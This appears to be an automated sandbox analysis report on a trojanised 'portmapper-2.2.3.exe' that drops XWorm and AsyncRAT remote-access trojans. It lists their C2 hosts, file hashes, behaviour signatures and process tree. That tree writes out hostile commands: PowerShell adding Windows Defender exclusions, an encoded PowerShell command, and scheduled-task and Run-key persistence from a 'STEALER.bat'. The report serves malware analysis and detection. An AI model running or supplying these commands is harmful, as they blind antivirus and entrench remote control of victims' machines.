Analysis

  • max time kernel
    7s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-09-2024 19:23

General

  • Target

    portmapper-2.2.3.exe

  • Size

    5.2MB

  • MD5

    9f14a0573f96ce3c3374044e585f7eb0

  • SHA1

    88247dac3c2a4e5a760c215436a99afe9ad5577f

  • SHA256

    e5f62be708a0caa8b4e5dfcf07127eabc49a8a61a300f434367718b7e7c2e7e3

  • SHA512

    f1e5af30c5c251a294998eb15cef22d22c6e30c900e08d86721ad3bfe400b86b8866c8ec66082014f3f3da2fb576a4cf35f1ff9e1f36d1dad26403fa96f9f91b

  • SSDEEP

    98304:rqw3fQlyOEaEyr9QsYhzAkSuwnu0J74Ijb4eDaJo99AXvhdkfx5:rqw3fsVPYa7J7zjxae7iZdK

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:3232

l838.ddns.net:3232

0x365c3e6EeF15a2938FC7267D5A3386c8e23aBc5F:123

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Windows Security Wrapper.exe

Extracted

Family

asyncrat

Version

L838 RAT v1.0.0

Botnet

Default

C2

127.0.0.1:54984

l838.ddns.net:54984

Mutex

kswxiqghhjgkjqpqzz

Attributes
  • delay

    3

  • install

    true

  • install_file

    Windows Service Wrapper.exe

  • install_folder

    %programdata%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Detect Xworm Payload 2 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe
    "C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3536
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAegBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYwBoACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3128
      • C:\Users\Admin\WindowsSmartScreen.exe
        "C:\Users\Admin\WindowsSmartScreen.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsSmartScreen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:5044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSmartScreen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Security Wrapper.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Wrapper.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:1792
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Security Wrapper" /tr "C:\ProgramData\Windows Security Wrapper.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4452
      • C:\Users\Admin\WindowsDriverFoundation.exe
        "C:\Users\Admin\WindowsDriverFoundation.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4404
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STEALER.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Disabling-WindowsRecoveryEnvironment"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1020
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsExecutables'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3604
        • C:\Windows\SysWOW64\reg.exe
          reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
          4⤵
          PID:1108
        • C:\Windows\SysWOW64\find.exe
          find /i "SystemUpdateWindowsSmartScreen"
          4⤵
          PID:1608
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsSmartScreen" /t REG_SZ /d "C:\Users\Admin\WindowsSmartScreen.exe" /f
          4⤵
          PID:3476
        • C:\Windows\SysWOW64\reg.exe
          reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
          4⤵
          PID:1812
        • C:\Windows\SysWOW64\find.exe
          find /i "SystemUpdateWindowsDriverFoundation"
          4⤵
          PID:4672
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsDriverFoundation" /t REG_SZ /d "C:\Users\Admin\WindowsDriverFoundation.exe" /f
          4⤵
          PID:3400
      • C:\Users\Admin\AppData\Roaming\trellrt.exe
        "C:\Users\Admin\AppData\Roaming\trellrt.exe"
        3⤵
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3592
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /create /f /tn "DDP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9460.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:384
    • C:\Program Files\Java\jre-1.8\bin\javaw.exe
      "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar"
      2⤵
      PID:3408

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
    2KB
    MD5
    d85ba6ff808d9e5444a4b369f5bc2730
    SHA1
    31aa9d96590fff6981b315e0b391b575e4c0804a
    SHA256
    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
    SHA512
    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize
    2KB
    MD5
    968cb9309758126772781b83adb8a28f
    SHA1
    8da30e71accf186b2ba11da1797cf67f8f78b47c
    SHA256
    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
    SHA512
    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    18KB
    MD5
    0e9b63ff12dff8594b547aac2aa30288
    SHA1
    53e7292a0cbbdba76eb10d0b8706123addf3f203
    SHA256
    12594dacb3a08e9be69626e651bbead4f45a2f13947ad076ec32a60f28b38402
    SHA512
    5f1e7d2d9a4c778d8333f3e1f5724bad32f91cd79b176bda92d840999fe5e3fbdfdccc7ef5daed53b1fad3ad66a2019338c8b876f12d61cdade6a35ce520d4e0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    944B
    MD5
    9b80cd7a712469a4c45fec564313d9eb
    SHA1
    6125c01bc10d204ca36ad1110afe714678655f2d
    SHA256
    5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
    SHA512
    ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    944B
    MD5
    34f595487e6bfd1d11c7de88ee50356a
    SHA1
    4caad088c15766cc0fa1f42009260e9a02f953bb
    SHA256
    0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
    SHA512
    10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    944B
    MD5
    ba169f4dcbbf147fe78ef0061a95e83b
    SHA1
    92a571a6eef49fff666e0f62a3545bcd1cdcda67
    SHA256
    5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
    SHA512
    8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe
    Filesize
    353KB
    MD5
    565ab186944e5842406ab4f9d74f46f5
    SHA1
    224bd1ca4711683c583945b3d6ecab5e5c639470
    SHA256
    679d4c6a8111b4948639cc03794708f234501e052b2ebe0451a3d8bcbc379328
    SHA512
    14b493887904eedcc55e2acf48196f4299a3e88a458ba75477a96796d644f5b11245f038cc0479d44bf58ea071c6a383a90c494654f775de4810ab2bb8129de8

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar
    Filesize
    5.0MB
    MD5
    df6057d0eeba1ab4266dd271536f1298
    SHA1
    8be95aa1a26c4c4328ca6c5a98ba34766f748102
    SHA256
    aa5f3fb51ff107a38aaf07537e79754d94855fbe62f95a8cb702d7eeed928b6e
    SHA512
    f291051434229931681a55afb313f0f595de52c0d176155343c3e05fa73a5378451a203be061265cf696a5f334190a1a8060b513ee6bc9e838efda5b26c06795

  • C:\Users\Admin\AppData\Local\Temp\STEALER.bat
    Filesize
    1KB
    MD5
    1f69a22a7a1b2d2fd521ce21eb188c8f
    SHA1
    e966e6e359bb9e7b77ed74e77375145e5cd21fdd
    SHA256
    54585cad234b01400a62516b60260366f8bf29fde4aaebd81cb6b1d4bfe0cce7
    SHA512
    905699190d5ee151ce34900920720e955a328a4d5012542529c8e22ccebcf96d0ab18f4b3977e3f1b65a41c52a7f2ede61ceff4eb07a9a66f8bf41ac7002d755

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nboed0it.bdu.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp9460.tmp
    Filesize
    1KB
    MD5
    c959800473a9762a191d5458383878a6
    SHA1
    b4e211472e313711cd59ada511b0d9ad38ed7ff3
    SHA256
    de79f0647decf1c96baa7c71f984a23f651745a047cc5d979f42824efc3ce701
    SHA512
    239dd7b34a46fd5abb06d81a979b0586e9a129293248df0afdc403e3be22671df0a1d422e5e9270d8fbe5faae415b4fff9fa747aa32ef695177c4ced38688128

  • C:\Users\Admin\AppData\Roaming\trellrt.exe
    Filesize
    203KB
    MD5
    40b631e57ce22a4b52cb382cc44204c9
    SHA1
    58f46159e4cd20044d60c2572b91f6d48e9afafd
    SHA256
    338c3e0d6dc067eb96eba389e63f60621bcd5b3573bf0e6fd73dced54fe55d7a
    SHA512
    060d1c6e2a706bf3f375eb50647ba4820ac0c9f2d34838bda5f0303f1ef14e75e83d9167e9f50a19d72bfe4bb55fc28b7e64aa650e379f5dd2077b9e3ebbbdba

  • C:\Users\Admin\WindowsDriverFoundation.exe
    Filesize
    74KB
    MD5
    e40cf402a05b77c43a1934802059a39d
    SHA1
    126f95a2d81c7007214be6933862485292fab294
    SHA256
    edcae846e567107bdc6a741cdda70b82cd2526829899bc16ba4651f68e76a16c
    SHA512
    ded21984cf2d95b9cab4b677f2c58cadd914f3b5b63ecae056bcfd55bfd43c03433dbef73156aaa99c4a1fd47a8e32e0371f49ae5113beca31a47dd8221f1259

  • C:\Users\Admin\WindowsSmartScreen.exe
    Filesize
    69KB
    MD5
    603b4a00b2f8cb021066710cc002e323
    SHA1
    8d8b2f0e16de8c3e40485f608405bce07a31b49b
    SHA256
    5e380cae6f287ef4a209916f2e0f86e1511bec721fe85ddbab2bcb30255ad9a2
    SHA512
    0beefc1647b5e4cdd058c0a0d1e7c739297733f4d4dbf4cf5f2588b2c1c23049376c392150a375df855a27e4c99cf05f2c924427bc457bbe7ca53e58d8958956

  • memory/1020-140-0x000000006F440000-0x000000006F48C000-memory.dmp
    Filesize
    304KB

  • memory/1020-158-0x0000000007C30000-0x0000000007C38000-memory.dmp
    Filesize
    32KB

  • memory/1020-157-0x0000000007D00000-0x0000000007D1A000-memory.dmp
    Filesize
    104KB

  • memory/1020-154-0x0000000007BB0000-0x0000000007BC1000-memory.dmp
    Filesize
    68KB

  • memory/1020-153-0x0000000007C40000-0x0000000007CD6000-memory.dmp
    Filesize
    600KB

  • memory/1020-150-0x00000000079B0000-0x00000000079CA000-memory.dmp
    Filesize
    104KB

  • memory/3128-93-0x0000000004B60000-0x0000000004BC6000-memory.dmp
    Filesize
    408KB

  • memory/3128-94-0x0000000004C40000-0x0000000004CA6000-memory.dmp
    Filesize
    408KB

  • memory/3128-139-0x0000000006C60000-0x0000000006D03000-memory.dmp
    Filesize
    652KB

  • memory/3128-128-0x000000006F440000-0x000000006F48C000-memory.dmp
    Filesize
    304KB

  • memory/3128-127-0x0000000006040000-0x0000000006072000-memory.dmp
    Filesize
    200KB

  • memory/3128-151-0x00000000073F0000-0x0000000007A6A000-memory.dmp
    Filesize
    6.5MB

  • memory/3128-152-0x0000000006E20000-0x0000000006E2A000-memory.dmp
    Filesize
    40KB

  • memory/3128-122-0x0000000005AB0000-0x0000000005AFC000-memory.dmp
    Filesize
    304KB

  • memory/3128-121-0x0000000005A80000-0x0000000005A9E000-memory.dmp
    Filesize
    120KB

  • memory/3128-155-0x0000000007010000-0x000000000701E000-memory.dmp
    Filesize
    56KB

  • memory/3128-156-0x0000000007020000-0x0000000007034000-memory.dmp
    Filesize
    80KB

  • memory/3128-84-0x0000000002490000-0x00000000024C6000-memory.dmp
    Filesize
    216KB

  • memory/3128-96-0x00000000054D0000-0x0000000005824000-memory.dmp
    Filesize
    3.3MB

  • memory/3128-138-0x0000000006020000-0x000000000603E000-memory.dmp
    Filesize
    120KB

  • memory/3128-92-0x0000000004AC0000-0x0000000004AE2000-memory.dmp
    Filesize
    136KB

  • memory/3128-86-0x0000000004DA0000-0x00000000053C8000-memory.dmp
    Filesize
    6.2MB

  • memory/3408-123-0x000001FA08D80000-0x000001FA08D81000-memory.dmp
    Filesize
    4KB

  • memory/3604-176-0x00000000067B0000-0x00000000067FC000-memory.dmp
    Filesize
    304KB

  • memory/3604-177-0x0000000071780000-0x00000000717CC000-memory.dmp
    Filesize
    304KB

  • memory/3604-187-0x00000000077C0000-0x0000000007863000-memory.dmp
    Filesize
    652KB

  • memory/3604-188-0x0000000007A70000-0x0000000007A81000-memory.dmp
    Filesize
    68KB

  • memory/3604-199-0x0000000007AA0000-0x0000000007AB4000-memory.dmp
    Filesize
    80KB

  • memory/3604-171-0x0000000005E90000-0x00000000061E4000-memory.dmp
    Filesize
    3.3MB

  • memory/4404-74-0x0000000000EB0000-0x0000000000EC8000-memory.dmp
    Filesize
    96KB

  • memory/4992-68-0x00000000006E0000-0x00000000006F8000-memory.dmp
    Filesize
    96KB

  • memory/5044-198-0x00000200764F0000-0x0000020076512000-memory.dmp
    Filesize
    136KB